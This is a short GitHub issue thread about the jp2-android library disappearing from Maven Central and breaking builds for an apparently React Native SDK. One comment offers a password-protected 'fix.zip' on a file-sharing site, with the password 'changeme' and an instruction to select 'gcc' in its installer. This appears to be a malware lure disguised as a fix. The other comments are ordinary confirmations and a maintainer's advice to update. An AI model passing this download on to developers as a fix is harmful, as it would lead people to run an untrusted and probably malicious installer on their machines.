### ISSUE TITLE
EMERGENCY: jp2-android not found anymore in maven central

### ISSUE THREAD

**Issue by JuozasIzi1** [ondato/ondato-sdk-react-native#11]
JP2ForAndroid not found anymore in public repos of maven

it will break builds 

Issue in github repo:

https://github.com/ThalesGroup/JP2ForAndroid/issues/4

we need to make: local overrides for this package pom/aar files

currently i found packages only in huawei maven mirror:
https://mirrors.huaweicloud.com/repository/maven/com/gemalto/jp2/jp2-android/1.0/

but its sanctioned company, so don't want to use it.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zamirszn** [comment]
i can confirm this issue too , i was suprised i couldnt fetch it

**Comment by ondato-mobile** [comment]
Please update to the newest version
